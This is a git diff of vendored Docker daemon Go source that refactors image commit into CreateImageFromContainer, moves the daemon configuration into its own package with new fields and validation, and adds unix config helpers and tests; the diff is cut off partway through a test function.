 // merge merges two Config, the image container configuration (defaults values),
@@ -94,6 +88,9 @@ func merge(userConf, imageConf *containertypes.Config) error {
 			if userConf.Healthcheck.Timeout == 0 {
 				userConf.Healthcheck.Timeout = imageConf.Healthcheck.Timeout
 			}
+			if userConf.Healthcheck.StartPeriod == 0 {
+				userConf.Healthcheck.StartPeriod = imageConf.Healthcheck.StartPeriod
+			}
 			if userConf.Healthcheck.Retries == 0 {
 				userConf.Healthcheck.Retries = imageConf.Healthcheck.Retries
 			}
@@ -117,155 +114,73 @@ func merge(userConf, imageConf *containertypes.Config) error {
 	return nil
 }
 
-// Commit creates a new filesystem image from the current state of a container.
-// The image can optionally be tagged into a repository.
-func (daemon *Daemon) Commit(name string, c *backend.ContainerCommitConfig) (string, error) {
+// CreateImageFromContainer creates a new image from a container. The container
+// config will be updated by applying the change set to the custom config, then
+// applying that config over the existing container config.
+func (daemon *Daemon) CreateImageFromContainer(name string, c *backend.CreateImageConfig) (string, error) {
 	start := time.Now()
 	container, err := daemon.GetContainer(name)
 	if err != nil {
 		return "", err
 	}
 
-	// It is not possible to commit a running container on Windows and on Solaris.
-	if (runtime.GOOS == "windows" || runtime.GOOS == "solaris") && container.IsRunning() {
-		return "", fmt.Errorf("%+v does not support commit of a running container", runtime.GOOS)
-	}
-
-	if c.Pause && !container.IsPaused() {
-		daemon.containerPause(container)
-		defer daemon.containerUnpause(container)
+	// It is not possible to commit a running container on Windows
+	if (runtime.GOOS == "windows") && container.IsRunning() {
+		return "", errors.Errorf("%+v does not support commit of a running container", runtime.GOOS)
 	}
 
-	newConfig, err := dockerfile.BuildFromConfig(c.Config, c.Changes)
-	if err != nil {
-		return "", err
+	if container.IsDead() {
+		err := fmt.Errorf("You cannot commit container %s which is Dead", container.ID)
+		return "", errdefs.Conflict(err)
 	}
 
-	if c.MergeConfigs {
-		if err := merge(newConfig, container.Config); err != nil {
-			return "", err
-		}
+	if container.IsRemovalInProgress() {
+		err := fmt.Errorf("You cannot commit container %s which is being removed", container.ID)
+		return "", errdefs.Conflict(err)
 	}
 
-	rwTar, err := daemon.exportContainerRw(container)
-	if err != nil {
-		return "", err
+	if c.Pause && !container.IsPaused() {
+		daemon.containerPause(container)
+		defer daemon.containerUnpause(container)
 	}
-	defer func() {
-		if rwTar != nil {
-			rwTar.Close()
-		}
-	}()
-
-	var history []image.History
-	rootFS := image.NewRootFS()
-	osVersion := ""
-	var osFeatures []string
 
-	if container.ImageID != "" {
-		img, err := daemon.imageStore.Get(container.ImageID)
-		if err != nil {
-			return "", err
-		}
-		history = img.History
-		rootFS = img.RootFS
-		osVersion = img.OSVersion
-		osFeatures = img.OSFeatures
+	if c.Config == nil {
+		c.Config = container.Config
 	}
-
-	l, err := daemon.layerStore.Register(rwTar, rootFS.ChainID())
+	newConfig, err := dockerfile.BuildFromConfig(c.Config, c.Changes, container.OS)
 	if err != nil {
 		return "", err
 	}
-	defer layer.ReleaseAndLog(daemon.layerStore, l)
-
-	h := image.History{
-		Author:     c.Author,
-		Created:    time.Now().UTC(),
-		CreatedBy:  strings.Join(container.Config.Cmd, " "),
-		Comment:    c.Comment,
-		EmptyLayer: true,
-	}
-
-	if diffID := l.DiffID(); layer.DigestSHA256EmptyTar != diffID {
-		h.EmptyLayer = false
-		rootFS.Append(diffID)
-	}
-
-	history = append(history, h)
-
-	config, err := json.Marshal(&image.Image{
-		V1Image: image.V1Image{
-			DockerVersion:   dockerversion.Version,
-			Config:          newConfig,
-			Architecture:    runtime.GOARCH,
-			OS:              runtime.GOOS,
-			Container:       container.ID,
-			ContainerConfig: *container.Config,
-			Author:          c.Author,
-			Created:         h.Created,
-		},
-		RootFS:     rootFS,
-		History:    history,
-		OSFeatures: osFeatures,
-		OSVersion:  osVersion,
-	})
-
-	if err != nil {
+	if err := merge(newConfig, container.Config); err != nil {
 		return "", err
 	}
 
-	id, err := daemon.imageStore.Create(config)
+	id, err := daemon.imageService.CommitImage(backend.CommitConfig{
+		Author:              c.Author,
+		Comment:             c.Comment,
+		Config:              newConfig,
+		ContainerConfig:     container.Config,
+		ContainerID:         container.ID,
+		ContainerMountLabel: container.MountLabel,
+		ContainerOS:         container.OS,
+		ParentImageID:       string(container.ImageID),
+	})
 	if err != nil {
 		return "", err
 	}
 
-	if container.ImageID != "" {
-		if err := daemon.imageStore.SetParent(id, container.ImageID); err != nil {
-			return "", err
-		}
-	}
-
-	imageRef := ""
+	var imageRef string
 	if c.Repo != "" {
-		newTag, err := reference.WithName(c.Repo) // todo: should move this to API layer
+		imageRef, err = daemon.imageService.TagImage(string(id), c.Repo, c.Tag)
 		if err != nil {
 			return "", err
 		}
-		if c.Tag != "" {
-			if newTag, err = reference.WithTag(newTag, c.Tag); err != nil {
-				return "", err
-			}
-		}
-		if err := daemon.TagImageWithReference(id, newTag); err != nil {
-			return "", err
-		}
-		imageRef = newTag.String()
 	}
-
-	attributes := map[string]string{
+	daemon.LogContainerEventWithAttributes(container, "commit", map[string]string{
 		"comment":  c.Comment,
 		"imageID":  id.String(),
 		"imageRef": imageRef,
-	}
-	daemon.LogContainerEventWithAttributes(container, "commit", attributes)
+	})
 	containerActions.WithValues("commit").UpdateSince(start)
 	return id.String(), nil
 }
-
-func (daemon *Daemon) exportContainerRw(container *container.Container) (io.ReadCloser, error) {
-	if err := daemon.Mount(container); err != nil {
-		return nil, err
-	}
-
-	archive, err := container.RWLayer.TarStream()
-	if err != nil {
-		daemon.Unmount(container) // logging is already handled in the `Unmount` function
-		return nil, err
-	}
-	return ioutils.NewReadCloserWrapper(archive, func() error {
-			archive.Close()
-			return container.RWLayer.Unmount()
-		}),
-		nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/config.go b/vendor/github.com/docker/docker/daemon/config/config.go
similarity index 60%
rename from vendor/github.com/docker/docker/daemon/config.go
rename to vendor/github.com/docker/docker/daemon/config/config.go
index 42ef18f74a..6cda223a11 100644
--- a/vendor/github.com/docker/docker/daemon/config.go
+++ b/vendor/github.com/docker/docker/daemon/config/config.go
@@ -1,4 +1,4 @@
-package daemon
+package config // import "github.com/docker/docker/daemon/config"
 
 import (
 	"bytes"
@@ -7,39 +7,42 @@ import (
 	"fmt"
 	"io"
 	"io/ioutil"
+	"os"
+	"reflect"
 	"runtime"
 	"strings"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
+	daemondiscovery "github.com/docker/docker/daemon/discovery"
 	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/authorization"
 	"github.com/docker/docker/pkg/discovery"
 	"github.com/docker/docker/registry"
 	"github.com/imdario/mergo"
+	"github.com/sirupsen/logrus"
 	"github.com/spf13/pflag"
 )
 
 const (
-	// defaultMaxConcurrentDownloads is the default value for
+	// DefaultMaxConcurrentDownloads is the default value for
 	// maximum number of downloads that
 	// may take place at a time for each pull.
-	defaultMaxConcurrentDownloads = 3
-	// defaultMaxConcurrentUploads is the default value for
+	DefaultMaxConcurrentDownloads = 3
+	// DefaultMaxConcurrentUploads is the default value for
 	// maximum number of uploads that
 	// may take place at a time for each push.
-	defaultMaxConcurrentUploads = 5
-	// stockRuntimeName is the reserved name/alias used to represent the
+	DefaultMaxConcurrentUploads = 5
+	// StockRuntimeName is the reserved name/alias used to represent the
 	// OCI runtime being shipped with the docker daemon package.
-	stockRuntimeName = "runc"
-)
-
-const (
-	defaultNetworkMtu    = 1500
-	disableNetworkBridge = "none"
-)
-
-const (
-	defaultShutdownTimeout = 15
+	StockRuntimeName = "runc"
+	// DefaultShmSize is the default value for container's shm size
+	DefaultShmSize = int64(67108864)
+	// DefaultNetworkMtu is the default value for network MTU
+	DefaultNetworkMtu = 1500
+	// DisableNetworkBridge is the default value of the option to disable network bridge
+	DisableNetworkBridge = "none"
+	// DefaultInitBinary is the name of the default init binary
+	DefaultInitBinary = "docker-init"
 )
 
 // flatOptions contains configuration keys
@@ -68,6 +71,12 @@ type commonBridgeConfig struct {
 	FixedCIDR string `json:"fixed-cidr,omitempty"`
 }
 
+// NetworkConfig stores the daemon-wide networking configurations
+type NetworkConfig struct {
+	// Default address pools for docker networks
+	DefaultAddressPools opts.PoolsOpt `json:"default-address-pools,omitempty"`
+}
+
 // CommonTLSOptions defines TLS configuration for the daemon server.
 // It includes json tags to deserialize configuration from a file
 // using the same names that the flags in the command line use.
@@ -82,25 +91,33 @@ type CommonTLSOptions struct {
 // It includes json tags to deserialize configuration from a file
 // using the same names that the flags in the command line use.
 type CommonConfig struct {
-	AuthorizationPlugins []string            `json:"authorization-plugins,omitempty"` // AuthorizationPlugins holds list of authorization plugins
-	AutoRestart          bool                `json:"-"`
-	Context              map[string][]string `json:"-"`
-	DisableBridge        bool                `json:"-"`
-	DNS                  []string            `json:"dns,omitempty"`
-	DNSOptions           []string            `json:"dns-opts,omitempty"`
-	DNSSearch            []string            `json:"dns-search,omitempty"`
-	ExecOptions          []string            `json:"exec-opts,omitempty"`
-	GraphDriver          string              `json:"storage-driver,omitempty"`
-	GraphOptions         []string            `json:"storage-opts,omitempty"`
-	Labels               []string            `json:"labels,omitempty"`
-	Mtu                  int                 `json:"mtu,omitempty"`
-	Pidfile              string              `json:"pidfile,omitempty"`
-	RawLogs              bool                `json:"raw-logs,omitempty"`
-	Root                 string              `json:"graph,omitempty"`
-	SocketGroup          string              `json:"group,omitempty"`
-	TrustKeyPath         string              `json:"-"`
-	CorsHeaders          string              `json:"api-cors-header,omitempty"`
-	EnableCors           bool                `json:"api-enable-cors,omitempty"`
+	AuthzMiddleware       *authorization.Middleware `json:"-"`
+	AuthorizationPlugins  []string                  `json:"authorization-plugins,omitempty"` // AuthorizationPlugins holds list of authorization plugins
+	AutoRestart           bool                      `json:"-"`
+	Context               map[string][]string       `json:"-"`
+	DisableBridge         bool                      `json:"-"`
+	DNS                   []string                  `json:"dns,omitempty"`
+	DNSOptions            []string                  `json:"dns-opts,omitempty"`
+	DNSSearch             []string                  `json:"dns-search,omitempty"`
+	ExecOptions           []string                  `json:"exec-opts,omitempty"`
+	GraphDriver           string                    `json:"storage-driver,omitempty"`
+	GraphOptions          []string                  `json:"storage-opts,omitempty"`
+	Labels                []string                  `json:"labels,omitempty"`
+	Mtu                   int                       `json:"mtu,omitempty"`
+	NetworkDiagnosticPort int                       `json:"network-diagnostic-port,omitempty"`
+	Pidfile               string                    `json:"pidfile,omitempty"`
+	RawLogs               bool                      `json:"raw-logs,omitempty"`
+	RootDeprecated        string                    `json:"graph,omitempty"`
+	Root                  string                    `json:"data-root,omitempty"`
+	ExecRoot              string                    `json:"exec-root,omitempty"`
+	SocketGroup           string                    `json:"group,omitempty"`
+	CorsHeaders           string                    `json:"api-cors-header,omitempty"`
+
+	// TrustKeyPath is used to generate the daemon ID and for signing schema 1 manifests
+	// when pushing to a registry which does not support schema 2. This field is marked as
+	// deprecated because schema 1 manifests are deprecated in favor of schema 2 and the
+	// daemon ID will use a dedicated identifier not shared with exported signatures.
+	TrustKeyPath string `json:"deprecated-key-path,omitempty"`
 
 	// LiveRestoreEnabled determines whether we should keep containers
 	// alive upon daemon shutdown/start
@@ -147,70 +164,54 @@ type CommonConfig struct {
 	// given to the /swarm/init endpoint and no advertise address is
 	// specified.
 	SwarmDefaultAdvertiseAddr string `json:"swarm-default-advertise-addr"`
-	MetricsAddress            string `json:"metrics-addr"`
+
+	// SwarmRaftHeartbeatTick is the number of ticks in time for swarm mode raft quorum heartbeat
+	// Typical value is 1
+	SwarmRaftHeartbeatTick uint32 `json:"swarm-raft-heartbeat-tick"`
+
+	// SwarmRaftElectionTick is the number of ticks to elapse before followers in the quorum can propose
+	// a new round of leader election.  Default, recommended value is at least 10X that of Heartbeat tick.
+	// Higher values can make the quorum less sensitive to transient faults in the environment, but this also
+	// means it takes longer for the managers to detect a down leader.
+	SwarmRaftElectionTick uint32 `json:"swarm-raft-election-tick"`
+
+	MetricsAddress string `json:"metrics-addr"`
 
 	LogConfig
-	bridgeConfig // bridgeConfig holds bridge network specific configuration.
+	BridgeConfig // bridgeConfig holds bridge network specific configuration.
+	NetworkConfig
 	registry.ServiceOptions
 
-	reloadLock sync.Mutex
-	valuesSet  map[string]interface{}
+	sync.Mutex
+	// FIXME(vdemeester) This part is not that clear and is mainly dependent on cli flags
+	// It should probably be handled outside this package.
+	ValuesSet map[string]interface{} `json:"-"`
 
 	Experimental bool `json:"experimental"` // Experimental indicates whether experimental features should be exposed or not
-}
 
-// InstallCommonFlags adds flags to the pflag.FlagSet to configure the daemon
-func (config *Config) InstallCommonFlags(flags *pflag.FlagSet) {
-	var maxConcurrentDownloads, maxConcurrentUploads int
-
-	config.ServiceOptions.InstallCliFlags(flags)
-
-	flags.Var(opts.NewNamedListOptsRef("storage-opts", &config.GraphOptions, nil), "storage-opt", "Storage driver options")
-	flags.Var(opts.NewNamedListOptsRef("authorization-plugins", &config.AuthorizationPlugins, nil), "authorization-plugin", "Authorization plugins to load")
-	flags.Var(opts.NewNamedListOptsRef("exec-opts", &config.ExecOptions, nil), "exec-opt", "Runtime execution options")
-	flags.StringVarP(&config.Pidfile, "pidfile", "p", defaultPidFile, "Path to use for daemon PID file")
-	flags.StringVarP(&config.Root, "graph", "g", defaultGraph, "Root of the Docker runtime")
-	flags.BoolVarP(&config.AutoRestart, "restart", "r", true, "--restart on the daemon has been deprecated in favor of --restart policies on docker run")
-	flags.MarkDeprecated("restart", "Please use a restart policy on docker run")
-	flags.StringVarP(&config.GraphDriver, "storage-driver", "s", "", "Storage driver to use")
-	flags.IntVar(&config.Mtu, "mtu", 0, "Set the containers network MTU")
-	flags.BoolVar(&config.RawLogs, "raw-logs", false, "Full timestamps without ANSI coloring")
-	// FIXME: why the inconsistency between "hosts" and "sockets"?
-	flags.Var(opts.NewListOptsRef(&config.DNS, opts.ValidateIPAddress), "dns", "DNS server to use")
-	flags.Var(opts.NewNamedListOptsRef("dns-opts", &config.DNSOptions, nil), "dns-opt", "DNS options to use")
-	flags.Var(opts.NewListOptsRef(&config.DNSSearch, opts.ValidateDNSSearch), "dns-search", "DNS search domains to use")
-	flags.Var(opts.NewNamedListOptsRef("labels", &config.Labels, opts.ValidateLabel), "label", "Set key=value labels to the daemon")
-	flags.StringVar(&config.LogConfig.Type, "log-driver", "json-file", "Default driver for container logs")
-	flags.Var(opts.NewNamedMapOpts("log-opts", config.LogConfig.Config, nil), "log-opt", "Default log driver options for containers")
-	flags.StringVar(&config.ClusterAdvertise, "cluster-advertise", "", "Address or interface name to advertise")
-	flags.StringVar(&config.ClusterStore, "cluster-store", "", "URL of the distributed storage backend")
-	flags.Var(opts.NewNamedMapOpts("cluster-store-opts", config.ClusterOpts, nil), "cluster-store-opt", "Set cluster store options")
-	flags.StringVar(&config.CorsHeaders, "api-cors-header", "", "Set CORS headers in the Engine API")
-	flags.IntVar(&maxConcurrentDownloads, "max-concurrent-downloads", defaultMaxConcurrentDownloads, "Set the max concurrent downloads for each pull")
-	flags.IntVar(&maxConcurrentUploads, "max-concurrent-uploads", defaultMaxConcurrentUploads, "Set the max concurrent uploads for each push")
-	flags.IntVar(&config.ShutdownTimeout, "shutdown-timeout", defaultShutdownTimeout, "Set the default shutdown timeout")
-
-	flags.StringVar(&config.SwarmDefaultAdvertiseAddr, "swarm-default-advertise-addr", "", "Set default address or interface for swarm advertised address")
-	flags.BoolVar(&config.Experimental, "experimental", false, "Enable experimental features")
-
-	flags.StringVar(&config.MetricsAddress, "metrics-addr", "", "Set default address and port to serve the metrics api on")
-
-	config.MaxConcurrentDownloads = &maxConcurrentDownloads
-	config.MaxConcurrentUploads = &maxConcurrentUploads
+	// Exposed node Generic Resources
+	// e.g: ["orange=red", "orange=green", "orange=blue", "apple=3"]
+	NodeGenericResources []string `json:"node-generic-resources,omitempty"`
+	// NetworkControlPlaneMTU allows to specify the control plane MTU, this will allow to optimize the network use in some components
+	NetworkControlPlaneMTU int `json:"network-control-plane-mtu,omitempty"`
+
+	// ContainerAddr is the address used to connect to containerd if we're
+	// not starting it ourselves
+	ContainerdAddr string `json:"containerd,omitempty"`
 }
 
 // IsValueSet returns true if a configuration value
 // was explicitly set in the configuration file.
-func (config *Config) IsValueSet(name string) bool {
-	if config.valuesSet == nil {
+func (conf *Config) IsValueSet(name string) bool {
+	if conf.ValuesSet == nil {
 		return false
 	}
-	_, ok := config.valuesSet[name]
+	_, ok := conf.ValuesSet[name]
 	return ok
 }
 
-// NewConfig returns a new fully initialized Config struct
-func NewConfig() *Config {
+// New returns a new fully initialized Config struct
+func New() *Config {
 	config := Config{}
 	config.LogConfig.Config = make(map[string]string)
 	config.ClusterOpts = make(map[string]string)
@@ -221,15 +222,13 @@ func NewConfig() *Config {
 	return &config
 }
 
-func parseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (string, error) {
-	if runtime.GOOS == "solaris" && (clusterAdvertise != "" || clusterStore != "") {
-		return "", errors.New("Cluster Advertise Settings not supported on Solaris")
-	}
+// ParseClusterAdvertiseSettings parses the specified advertise settings
+func ParseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (string, error) {
 	if clusterAdvertise == "" {
-		return "", errDiscoveryDisabled
+		return "", daemondiscovery.ErrDiscoveryDisabled
 	}
 	if clusterStore == "" {
-		return "", fmt.Errorf("invalid cluster configuration. --cluster-advertise must be accompanied by --cluster-store configuration")
+		return "", errors.New("invalid cluster configuration. --cluster-advertise must be accompanied by --cluster-store configuration")
 	}
 
 	advertise, err := discovery.ParseAdvertise(clusterAdvertise)
@@ -239,7 +238,7 @@ func parseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (strin
 	return advertise, nil
 }
 
-// GetConflictFreeLabels validate Labels for conflict
+// GetConflictFreeLabels validates Labels for conflict
 // In swarm the duplicates for labels are removed
 // so we only take same values here, no conflict values
 // If the key-value is the same we will only take the last label
@@ -263,34 +262,46 @@ func GetConflictFreeLabels(labels []string) ([]string, error) {
 	return newLabels, nil
 }
 
-// ReloadConfiguration reads the configuration in the host and reloads the daemon and server.
-func ReloadConfiguration(configFile string, flags *pflag.FlagSet, reload func(*Config)) error {
+// ValidateReservedNamespaceLabels errors if the reserved namespaces com.docker.*,
+// io.docker.*, org.dockerproject.* are used in a configured engine label.
+//
+// TODO: This is a separate function because we need to warn users first of the
+// deprecation.  When we return an error, this logic can be added to Validate
+// or GetConflictFreeLabels instead of being here.
+func ValidateReservedNamespaceLabels(labels []string) error {
+	for _, label := range labels {
+		lowered := strings.ToLower(label)
+		if strings.HasPrefix(lowered, "com.docker.") || strings.HasPrefix(lowered, "io.docker.") ||
+			strings.HasPrefix(lowered, "org.dockerproject.") {
+			return fmt.Errorf(
+				"label %s not allowed: the namespaces com.docker.*, io.docker.*, and org.dockerproject.* are reserved for Docker's internal use",
+				label)
+		}
+	}
+	return nil
+}
+
+// Reload reads the configuration in the host and reloads the daemon and server.
+func Reload(configFile string, flags *pflag.FlagSet, reload func(*Config)) error {
 	logrus.Infof("Got signal to reload configuration, reloading from: %s", configFile)
 	newConfig, err := getConflictFreeConfiguration(configFile, flags)
 	if err != nil {
-		return err
+		if flags.Changed("config-file") || !os.IsNotExist(err) {
+			return fmt.Errorf("unable to configure the Docker daemon with file %s: %v", configFile, err)
+		}
+		newConfig = New()
 	}
 
-	if err := ValidateConfiguration(newConfig); err != nil {
+	if err := Validate(newConfig); err != nil {
 		return fmt.Errorf("file configuration validation failed (%v)", err)
 	}
 
-	// Labels of the docker engine used to allow multiple values associated with the same key.
-	// This is deprecated in 1.13, and, be removed after 3 release cycles.
-	// The following will check the conflict of labels, and report a warning for deprecation.
-	//
-	// TODO: After 3 release cycles (1.16) an error will be returned, and labels will be
-	// sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels):
-	//
-	// newLabels, err := GetConflictFreeLabels(newConfig.Labels)
-	// if err != nil {
-	//      return err
-	// }
-	// newConfig.Labels = newLabels
-	//
-	if _, err := GetConflictFreeLabels(newConfig.Labels); err != nil {
-		logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err)
+	// Check if duplicate label-keys with different values are found
+	newLabels, err := GetConflictFreeLabels(newConfig.Labels)
+	if err != nil {
+		return err
 	}
+	newConfig.Labels = newLabels
 
 	reload(newConfig)
 	return nil
@@ -312,8 +323,8 @@ func MergeDaemonConfigurations(flagsConfig *Config, flags *pflag.FlagSet, config
 		return nil, err
 	}
 
-	if err := ValidateConfiguration(fileConfig); err != nil {
-		return nil, fmt.Errorf("file configuration validation failed (%v)", err)
+	if err := Validate(fileConfig); err != nil {
+		return nil, fmt.Errorf("configuration validation from file failed (%v)", err)
 	}
 
 	// merge flags configuration on top of the file configuration
@@ -323,8 +334,8 @@ func MergeDaemonConfigurations(flagsConfig *Config, flags *pflag.FlagSet, config
 
 	// We need to validate again once both fileConfig and flagsConfig
 	// have been merged
-	if err := ValidateConfiguration(fileConfig); err != nil {
-		return nil, fmt.Errorf("file configuration validation failed (%v)", err)
+	if err := Validate(fileConfig); err != nil {
+		return nil, fmt.Errorf("merged configuration validation from file and command line flags failed (%v)", err)
 	}
 
 	return fileConfig, nil
@@ -384,12 +395,25 @@ func getConflictFreeConfiguration(configFile string, flags *pflag.FlagSet) (*Con
 			})
 		}
 
-		config.valuesSet = configSet
+		config.ValuesSet = configSet
 	}
 
 	reader = bytes.NewReader(b)
-	err = json.NewDecoder(reader).Decode(&config)
-	return &config, err
+	if err := json.NewDecoder(reader).Decode(&config); err != nil {
+		return nil, err
+	}
+
+	if config.RootDeprecated != "" {
+		logrus.Warn(`The "graph" config file option is deprecated. Please use "data-root" instead.`)
+
+		if config.Root != "" {
+			return nil, fmt.Errorf(`cannot specify both "graph" and "data-root" config file options`)
+		}
+
+		config.Root = config.RootDeprecated
+	}
+
+	return &config, nil
 }
 
 // configValuesSet returns the configuration values explicitly set in the file.
@@ -472,10 +496,10 @@ func findConfigurationConflicts(config map[string]interface{}, flags *pflag.Flag
 	return nil
 }
 
-// ValidateConfiguration validates some specific configs.
+// Validate validates some specific configs.
 // such as config.DNS, config.Labels, config.DNSSearch,
 // as well as config.MaxConcurrentDownloads, config.MaxConcurrentUploads.
-func ValidateConfiguration(config *Config) error {
+func Validate(config *Config) error {
 	// validate DNS
 	for _, dns := range config.DNS {
 		if _, err := opts.ValidateIPAddress(dns); err != nil {
@@ -496,30 +520,48 @@ func ValidateConfiguration(config *Config) error {
 			return err
 		}
 	}
-
 	// validate MaxConcurrentDownloads
-	if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil && *config.MaxConcurrentDownloads < 0 {
+	if config.MaxConcurrentDownloads != nil && *config.MaxConcurrentDownloads < 0 {
 		return fmt.Errorf("invalid max concurrent downloads: %d", *config.MaxConcurrentDownloads)
 	}
-
 	// validate MaxConcurrentUploads
-	if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil && *config.MaxConcurrentUploads < 0 {
+	if config.MaxConcurrentUploads != nil && *config.MaxConcurrentUploads < 0 {
 		return fmt.Errorf("invalid max concurrent uploads: %d", *config.MaxConcurrentUploads)
 	}
 
 	// validate that "default" runtime is not reset
 	if runtimes := config.GetAllRuntimes(); len(runtimes) > 0 {
-		if _, ok := runtimes[stockRuntimeName]; ok {
-			return fmt.Errorf("runtime name '%s' is reserved", stockRuntimeName)
+		if _, ok := runtimes[StockRuntimeName]; ok {
+			return fmt.Errorf("runtime name '%s' is reserved", StockRuntimeName)
 		}
 	}
 
-	if defaultRuntime := config.GetDefaultRuntimeName(); defaultRuntime != "" && defaultRuntime != stockRuntimeName {
+	if _, err := ParseGenericResources(config.NodeGenericResources); err != nil {
+		return err
+	}
+
+	if defaultRuntime := config.GetDefaultRuntimeName(); defaultRuntime != "" && defaultRuntime != StockRuntimeName {
 		runtimes := config.GetAllRuntimes()
 		if _, ok := runtimes[defaultRuntime]; !ok {
 			return fmt.Errorf("specified default runtime '%s' does not exist", defaultRuntime)
 		}
 	}
 
-	return nil
+	// validate platform-specific settings
+	return config.ValidatePlatformConfig()
+}
+
+// ModifiedDiscoverySettings returns whether the discovery configuration has been modified or not.
+func ModifiedDiscoverySettings(config *Config, backendType, advertise string, clusterOpts map[string]string) bool {
+	if config.ClusterStore != backendType || config.ClusterAdvertise != advertise {
+		return true
+	}
+
+	if (config.ClusterOpts == nil && clusterOpts == nil) ||
+		(config.ClusterOpts == nil && len(clusterOpts) == 0) ||
+		(len(config.ClusterOpts) == 0 && clusterOpts == nil) {
+		return false
+	}
+
+	return !reflect.DeepEqual(config.ClusterOpts, clusterOpts)
 }
diff --git a/vendor/github.com/docker/docker/daemon/config/config_common_unix.go b/vendor/github.com/docker/docker/daemon/config/config_common_unix.go
new file mode 100644
index 0000000000..4bdf758869
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config/config_common_unix.go
@@ -0,0 +1,71 @@
+// +build linux freebsd
+
+package config // import "github.com/docker/docker/daemon/config"
+
+import (
+	"net"
+
+	"github.com/docker/docker/api/types"
+)
+
+// CommonUnixConfig defines configuration of a docker daemon that is
+// common across Unix platforms.
+type CommonUnixConfig struct {
+	Runtimes          map[string]types.Runtime `json:"runtimes,omitempty"`
+	DefaultRuntime    string                   `json:"default-runtime,omitempty"`
+	DefaultInitBinary string                   `json:"default-init,omitempty"`
+}
+
+type commonUnixBridgeConfig struct {
+	DefaultIP                   net.IP `json:"ip,omitempty"`
+	IP                          string `json:"bip,omitempty"`
+	DefaultGatewayIPv4          net.IP `json:"default-gateway,omitempty"`
+	DefaultGatewayIPv6          net.IP `json:"default-gateway-v6,omitempty"`
+	InterContainerCommunication bool   `json:"icc,omitempty"`
+}
+
+// GetRuntime returns the runtime path and arguments for a given
+// runtime name
+func (conf *Config) GetRuntime(name string) *types.Runtime {
+	conf.Lock()
+	defer conf.Unlock()
+	if rt, ok := conf.Runtimes[name]; ok {
+		return &rt
+	}
+	return nil
+}
+
+// GetDefaultRuntimeName returns the current default runtime
+func (conf *Config) GetDefaultRuntimeName() string {
+	conf.Lock()
+	rt := conf.DefaultRuntime
+	conf.Unlock()
+
+	return rt
+}
+
+// GetAllRuntimes returns a copy of the runtimes map
+func (conf *Config) GetAllRuntimes() map[string]types.Runtime {
+	conf.Lock()
+	rts := conf.Runtimes
+	conf.Unlock()
+	return rts
+}
+
+// GetExecRoot returns the user configured Exec-root
+func (conf *Config) GetExecRoot() string {
+	return conf.ExecRoot
+}
+
+// GetInitPath returns the configured docker-init path
+func (conf *Config) GetInitPath() string {
+	conf.Lock()
+	defer conf.Unlock()
+	if conf.InitPath != "" {
+		return conf.InitPath
+	}
+	if conf.DefaultInitBinary != "" {
+		return conf.DefaultInitBinary
+	}
+	return DefaultInitBinary
+}
diff --git a/vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go b/vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go
new file mode 100644
index 0000000000..47774a8ec1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go
@@ -0,0 +1,84 @@
+// +build !windows
+
+package config // import "github.com/docker/docker/daemon/config"
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestCommonUnixValidateConfigurationErrors(t *testing.T) {
+	testCases := []struct {
+		config *Config
+	}{
+		// Can't override the stock runtime
+		{
+			config: &Config{
+				CommonUnixConfig: CommonUnixConfig{
+					Runtimes: map[string]types.Runtime{
+						StockRuntimeName: {},
+					},
+				},
+			},
+		},
+		// Default runtime should be present in runtimes
+		{
+			config: &Config{
+				CommonUnixConfig: CommonUnixConfig{
+					Runtimes: map[string]types.Runtime{
+						"foo": {},
+					},
+					DefaultRuntime: "bar",
+				},
+			},
+		},
+	}
+	for _, tc := range testCases {
+		err := Validate(tc.config)
+		if err == nil {
+			t.Fatalf("expected error, got nil for config %v", tc.config)
+		}
+	}
+}
+
+func TestCommonUnixGetInitPath(t *testing.T) {
+	testCases := []struct {
+		config           *Config
+		expectedInitPath string
+	}{
+		{
+			config: &Config{
+				InitPath: "some-init-path",
+			},
+			expectedInitPath: "some-init-path",
+		},
+		{
+			config: &Config{
+				CommonUnixConfig: CommonUnixConfig{
+					DefaultInitBinary: "foo-init-bin",
+				},
+			},
+			expectedInitPath: "foo-init-bin",
+		},
+		{
+			config: &Config{
+				InitPath: "init-path-A",
+				CommonUnixConfig: CommonUnixConfig{
+					DefaultInitBinary: "init-path-B",
+				},
+			},
+			expectedInitPath: "init-path-A",
+		},
+		{
+			config:           &Config{},
+			expectedInitPath: "docker-init",
+		},
+	}
+	for _, tc := range testCases {
+		initPath := tc.config.GetInitPath()
+		if initPath != tc.expectedInitPath {
+			t.Fatalf("expected initPath to be %v, got %v", tc.expectedInitPath, initPath)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/config/config_test.go b/vendor/github.com/docker/docker/daemon/config/config_test.go
new file mode 100644
index 0000000000..6998ed3312
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config/config_test.go
@@ -0,0 +1,518 @@
+package config // import "github.com/docker/docker/daemon/config"
+
+import (
+	"io/ioutil"
+	"os"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/daemon/discovery"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/pflag"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
+	"gotest.tools/skip"
+)
+
+func TestDaemonConfigurationNotFound(t *testing.T) {
+	_, err := MergeDaemonConfigurations(&Config{}, nil, "/tmp/foo-bar-baz-docker")
+	if err == nil || !os.IsNotExist(err) {
+		t.Fatalf("expected does not exist error, got %v", err)
+	}
+}
+
+func TestDaemonBrokenConfiguration(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
